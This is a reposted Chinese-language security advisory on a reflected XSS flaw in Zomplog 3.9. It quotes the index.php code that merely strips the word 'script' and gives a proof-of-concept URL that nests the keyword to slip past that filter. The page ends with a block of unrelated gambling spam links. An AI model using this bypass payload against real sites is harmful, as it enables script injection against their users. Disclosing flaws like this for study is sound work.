歡迎來到 黑吧安全網 聚焦網絡安全前沿資訊,精華內容,交流技術心得!

Zomplog 3.9 XSS 漏洞利用

來源:本站轉載 作者:佚名 時間:2010-04-12 TAG: 我要投稿
漏洞文件index.php 
漏洞代碼: 

10: // some general xxs protection 
11: $_GET[’search’] = str_replace(’script’, ’’, $_GET[’search’]); 
12: $_GET[’username’] = str_replace(’script’, ’’, $_GET[’username’]); 
代碼只是刪除腳本文件的關鍵字,頁面易受XSS攻擊 

POC 
http://www.site.com/index.php?search="><scrscriptipt>alert(1)</scrscriptipt>\ 
【聲明】:黑吧安全網(http://www.650547.live)登載此文出于傳遞更多信息之目的,并不代表本站贊同其觀點和對其真實性負責,僅適于網絡安全技術愛好者學習研究使用,學習中請遵循國家相關法律法規。如有問題請聯系我們,聯系郵箱[email protected],我們會在最短的時間內進行處理。
  • 最新更新
    • 相關閱讀
      • 本類熱門
        • 最近下載
        安徽快3自由的百科 十一运夺金软件漏洞 五分彩上可以撤回所有钱么 我在我在线河北快三 黑龙江快乐十分规律 南昌股指期货配资 中国体育彩票官网查询 幸运飞艇玩三码 七星彩第一位杀号 1000炒股一年最多挣多少 黑龙江11选五开奖图